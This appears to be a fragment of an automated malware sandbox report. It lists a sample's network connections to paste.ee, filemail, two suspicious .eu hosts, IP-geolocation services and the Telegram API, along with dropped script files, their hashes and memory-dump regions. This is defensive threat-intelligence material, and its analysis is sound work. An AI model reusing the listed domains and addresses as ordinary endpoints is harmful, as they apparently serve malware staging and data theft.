"C:\Windows\SysWOW64\dxdiag.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:80 | paste.ee | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 200.187.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.209.215.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gig.energymaxgrp.eu | udp |
| US | 107.174.244.110:80 | gig.energymaxgrp.eu | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 8.8.8.8:53 | 110.244.174.107.in-addr.arpa | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 168.6.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pdf.maxengrygrp.eu | udp |
| US | 107.174.244.110:80 | pdf.maxengrygrp.eu | tcp |
| US | 107.174.244.110:80 | pdf.maxengrygrp.eu | tcp |
| US | 107.174.244.110:80 | pdf.maxengrygrp.eu | tcp |
| US | 107.174.244.110:80 | pdf.maxengrygrp.eu | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js
| MD5 | 3d68e0db63d092d83baf5f2e61a2240c |
| SHA1 | 54bec790443c5eceea3819b516714d8d73588684 |
| SHA256 | 718f980994f02da3640c8618398ac88a4c3bfb7df0dd9ba118af2f5ef305819a |
| SHA512 | 115f21a1066286b28855a3ddf9aa2d3f37525bbc9da5807755a8b5b5111bd4e1af539388f8ab69dea37c0ac36096fbe837bad4a52939bc31847bc2583a2841cf |
memory/3028-4-0x00000229C4810000-0x00000229C4832000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u2fd4zg5.3tf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/740-23-0x0000020B72EB0000-0x0000020B73008000-memory.dmp
memory/2676-24-0x0000000000400000-0x0000000000437000-memory.dmp
memory/2676-27-0x0000000000400000-0x0000000000437000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
memory/2676-31-0x00000000033E0000-0x0000000003430000-memory.dmp
memory/2676-32-0x0000000005F80000-0x0000000006524000-memory.dmp
memory/2676-33-0x0000000003530000-0x000000000357E000-memory.dmp
memory/2676-34-0x00000000059D0000-0x0000000005A6C000-memory.dmp
memory/2676-35-0x0000000006B80000-0x0000000006D42000-memory.dmp
memory/2676-36-0x0000000006A20000-0x0000000006A70000-memory.dmp
memory/2676-37-0x0000000007280000-0x00000000077AC000-memory.dmp
memory/2676-38-0x0000000007070000-0x0000000007102000-memory.dmp
memory/2676-39-0x0000000006E20000-0x0000000006E2A000-memory.dmp